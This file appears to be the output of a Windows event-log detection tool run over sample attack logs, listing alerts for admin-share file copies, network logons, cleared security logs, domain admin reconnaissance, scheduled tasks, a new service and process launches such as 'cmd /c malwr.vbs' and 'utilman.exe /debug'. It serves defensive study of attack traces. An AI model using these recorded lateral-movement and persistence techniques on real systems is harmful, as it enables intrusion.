2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\ui\SwDRM.dll | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:10.063 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-19 07:15:36.036 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer:  | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x10fac2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
2019-03-19 07:15:49.583 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer:  | IP Addr: 10.0.2.17 | LID: 0x10fbcc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer:  | IP Addr: 10.0.2.17 | LID: 0x10fbeb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x10fc09,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
2019-03-19 07:15:49.692 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: user01 | Computer:  | IP Addr: 10.0.2.17 | LID: 0x110085,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
2019-03-19 08:23:37.147 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:43.570 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer:  | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e162,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.491 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: user01 | Computer:  | IP Addr: 10.0.2.17 | LID: 0x15e1a7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.507 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: user01 | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.0.2.17 | LID: 0x15e1a7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: WIN-77LTAPHIQ1R$ | Share Name: \\*\SYSVOL | Share Path: \??\C:\Windows\SYSVOL\sysvol | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e25f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer:  | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e25f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:15.647 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: WIN-77LTAPHIQ1R | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 09:02:00.383 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.179 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: NULL | IP Addr: 10.0.2.17 | LID: 0x17e29a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer:  | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer:  | IP Addr: 10.0.2.17 | LID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer:  | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer:  | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer:  | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2d2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx
2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.367 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:07.430 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:07.445 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:07.508 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:07.523 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:16.835 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: WIN-77LTAPHIQ1R | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:21.929 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer:  | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x18423d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:41:29.008 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,info,,New Service Installed,Name: remotesvc | Path: calc.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx
2019-03-20 02:22:24.761 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x39e47fa | PID: 3824 | PGUID: 365ABB72-2550-5C91-0000-00108FE4CF05",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:22:24.851 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x39e47fa | PID: 3688 | PGUID: 365ABB72-2550-5C91-0000-00101EE6CF05,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:22:24.901 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x39e47fa | PID: 4088 | PGUID: 365ABB72-2550-5C91-0000-00106CEACF05",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:22:40.373 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x39e47fa | PID: 3092 | PGUID: 365ABB72-2560-5C91-0000-0010C721DA05,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:26:03.585 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 4004 | PGUID: 365ABB72-262B-5C91-0000-0010B2566006,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:26:05.628 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x39e47fa | PID: 2792 | PGUID: 365ABB72-262D-5C91-0000-00108EA26106,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:31:03.687 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 3264 | PGUID: 365ABB72-2757-5C91-0000-0010A2B52A07,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:36:03.788 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 2056 | PGUID: 365ABB72-2883-5C91-0000-00101656F407,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:41:03.890 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 1756 | PGUID: 365ABB72-29AF-5C91-0000-0010B895C008,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:41:08.777 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1876 | PGUID: 365ABB72-29B4-5C91-0000-00108191C308",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:41:08.967 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.EXE /c malwr.vbs | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x39e47fa | PID: 3748 | PGUID: 365ABB72-29B4-5C91-0000-0010289AC308,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:41:08.977 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logoff | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x39e47fa | PID: 3488 | PGUID: 365ABB72-29B4-5C91-0000-0010999AC308,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:41:09.828 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x1 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 2384 | PGUID: 365ABB72-29B5-5C91-0000-0010BE04C408",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 02:42:05.859 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe C:\Windows\system32\CompatTelRunner.exe | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 4012 | PGUID: 365ABB72-29ED-5C91-0000-00107271E808,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.238 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 360 | PGUID: 365ABB72-528C-5C91-0000-00104B4B0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.458 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 368 | PGUID: 365ABB72-528C-5C91-0000-0010644D0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.699 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 408 | PGUID: 365ABB72-528D-5C91-0000-00103B500000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
